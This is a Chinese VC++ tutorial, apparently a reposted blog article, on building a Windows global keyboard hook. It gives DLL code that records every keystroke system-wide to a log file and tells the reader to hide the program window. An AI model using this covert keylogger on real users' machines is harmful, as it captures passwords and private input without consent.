在科研生產中對研制、調試操作的記錄是非常有必要而且是有很重要價值的。通過對記錄信息的分析,可以在事故發
生后準確的分析出事故的起因、操作是否存在失誤等許多重要線索。通常需要記錄的信息是多種多樣的,如環境溫度記錄、軟件運行記錄、文件訪問記錄等等。這里
將以鍵盤信息記錄為例來講述類似的實驗信息自動記錄的一般實現方法。
由于需要記錄當前系統下所有應用程序的鍵盤錄入記錄,因此必須采
取某種特殊的技術來實現本進程(監視程序)對外部進程鍵盤操作信息的獲取。這種技術便是本文將要論述的核心--系統全局鉤子。本文下面將對Win32平臺
下全局鉤子的運行機制進行介紹并給出了一個具體的由VC++6.0編寫的捕獲鍵盤動作的鍵盤鉤子示例程序。
系統鉤子和DLL
鉤子的本質是一段用以處理系統消息的程序,通過系統調用,將其掛入系統。鉤子的種類有很多,每種鉤子可以截獲并處理相應的消息,每當特定的消息發出,在
到達目的窗口之前,鉤子程序先行截獲該消息、得到對此消息的控制權。此時在鉤子函數中就可以對截獲的消息進行加工處理,甚至可以強制結束消息的傳遞。
在本程序中我們需要捕獲在任意窗口上的鍵盤輸入,這就需要采用全局鉤子以便攔截整個系統的消息,而全局鉤子函數必須以DLL(
動態連接庫)為載體進行封裝,VC6中有三種形式的MFC DLL可供選擇,即Regular statically linked
to
MFC DLL(標準靜態鏈接MFC DLL)、Regular using the shared MFC DLL(標準動態鏈接MFC
DLL)以及Extension MFC DLL(擴展MFC DLL)。 在本程序中為方便起見采用了標準靜態連接MFC DLL。
鍵盤鉤子程序示例
本示例程序用到全局鉤子函數,程序分兩部分:可執行程序KeyKook和動態連接庫LaunchDLL。首先創建一個MFC
AppWizard(DLL)工程,并選擇Regular statically linked to MFC DLL(標準靜態鏈接MFC
DLL)選項,以建立MFC擴展動態連接庫LaunchDLL.dll。之后,在相應的頭文件中添加宏定義和待導出函數的聲明:
#define DllExport __declspec(dllexport) …… DllExport void WINAPI InstallLaunchEv(); …… class CLaunchDLLApp : public CWinApp { public: CLaunchDLLApp(); //{{AFX_VIRTUAL(CLaunchDLLApp) //}}AFX_VIRTUAL //{{AFX_MSG(CLaunchDLLApp) // NOTE - the ClassWizard will add and remove member functions here. // DO NOT EDIT what you see in these blocks of generated code ! //}}AFX_MSG DECLARE_MESSAGE_MAP() }; |
同時在實現文件中添加全局變量Hook和全局函數LauncherHook()、SaveLog():
HHOOK Hook; LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam); void SaveLog(char* c); |
最后,完成以上提到的這幾個函數的具體編碼實現:
CLaunchDLLApp theApp; …… DllExport void WINAPI InstallLaunchEv() { Hook=(HHOOK)SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)LauncherHook,theApp.m_hInstance,0); } |
在此我們實現了Windows的系統鉤子的
安裝,首先要調用SDK中的API函數SetWindowsHookEx()來安裝這個鉤子函數,其原型是:
HHOOK SetWindowsHookEx(int idHook,HOOKPROC lpfn,HINSTANCE hMod,DWORD dwThreadId); |
其中,第一個參數指定鉤子的類型,常用的有WH_MOUSE、WH_KEYBOARD、WH_GETMESSAGE等,在此我們只關心鍵盤操作所以設定
為WH_KEYBOARD;第二個參數標識鉤子函數的入口地址,當鉤子鉤到任何消息后便調用這個函數,即當不管系統的哪個窗口有鍵盤輸入馬上會引起
LauncherHook的動作;第三個參數是鉤子函數所在模塊的句柄,我們可以很簡單的設定其為本應用程序的實例句柄;最后一個參數是鉤子相關函數的
ID用以指定想讓鉤子去鉤哪個線程,為0時則攔截整個系統的消息,在本程序中鉤子需要為全局鉤子,故設定為0。
LRESULT CALLBACK LauncherHook(int nCode,WPARAM wParam,LPARAM lParam) { LRESULT Result=CallNextHookEx(Hook,nCode,wParam,lParam); if(nCode==HC_ACTION) { if(lParam & 0x80000000) { char c[1]; c[0]=wParam; SaveLog(c); } } return Result; } |
雖然調用CallNextHookEx()是可選的,但調用此函數的習慣是很值得推薦的;否則的話,其他安裝了鉤子的應用程序將不會接收到鉤子的通知而且還有可能產生不正確的結果,所以我們應盡量調用該函數除非絕對需要阻止其他程序獲取通知。
void SaveLog(char* c) { CTime tm=CTime::GetCurrentTime(); CString name; name.Format("c:\\Key_%d_%d.log",tm.GetMonth(),tm.GetDay()); CFile file; if(!file.Open(name,CFile::modeReadWrite)) { file.Open(name,CFile::modeCreate|CFile::modeReadWrite); } file.SeekToEnd(); file.Write(c,1); file.Close(); } |
當有鍵彈起的時候就通過此函數將剛彈起的鍵保存到記錄文件中從而實現對鍵盤進行監控記錄的目的。編譯完成便可得到運行時所需的鍵盤鉤子的動態連接庫和進行靜態鏈接時用到的lib庫。
下面開始編寫調用此動態連接庫的主程序,并實現最后的集成。另外創建一個單文檔應用程序,把所需的動態鏈接庫頭文件、lib庫復制到工程目錄中,將動態
鏈接庫復制到Debug目錄下。然后鏈接DLL庫:在"Project","Settings…"的"Link"屬性頁內,
在"Object/librarymodules:"中填入"LaunchDLL.lib"。再通過"Project","Add To
Project","Files…"將LaunchDLL.h添加到工程中來,最后在視類的源文件KeyHook.cpp中加入對其的引用:
如果用VC2008,此處不用像VC6.0這樣設置, 只要把路徑加上, 并且引用lib就可以.
這樣我們就可以象使用本工程內的 函數一樣使用動態連接庫LaunchDLL.dll中的所有導出函數了。接下來在視類重載虛函數OnInitialUpdate(),并添加代碼完成對鍵盤鉤子的安裝:
如果用VC2008,不用重載此函數, 可以直接加到InitInstance() 末尾處.
到此為止其實已經完成了所有的功能,但由于本程序是作為一個后臺監控軟件運行,因此還應當采取其他措施以隱藏其
程序界面。這只需在應用程序類CkeyHookApp的InitInstance()函數中將m_pMainWnd->ShowWindow(SW_SHOW)改為m_pMainWnd->ShowWindow(SW_HIDE)即可。
最后需要調用UnhookWindowsHookEx來卸載鉤子, 在LaunchDLL里完成, HOOKDLLEXPORT void WINAPI StopHook()
{
UnhookWindowsHookEx(g_Hook);
g_Hook = NULL;
}
小結
編譯運行程序,運行起來之后并無什么現象,但通過Alt+Ctrl+Del在關閉程序對話框內可以找到我們剛編寫完畢的程序"KeyHook",隨便在
什么程序中通過鍵盤輸入字符,然后打開記錄文件,我們會發現:通過鍵盤鉤子,我們剛才輸入的字符都被記錄到記錄文件中了。系統鉤子具有相當強大的功能,通
過這種技術可以對幾乎所有的Windows系統消息進行攔截、監視、處理。這種技術廣泛應用于各種自動監控系統中。本文所述程序在Windows
2000 Professional + SP4下由Microsoft Visual C++ 6.0編譯調試通過。
http://www.programfan.com/blog/article.asp?id=20338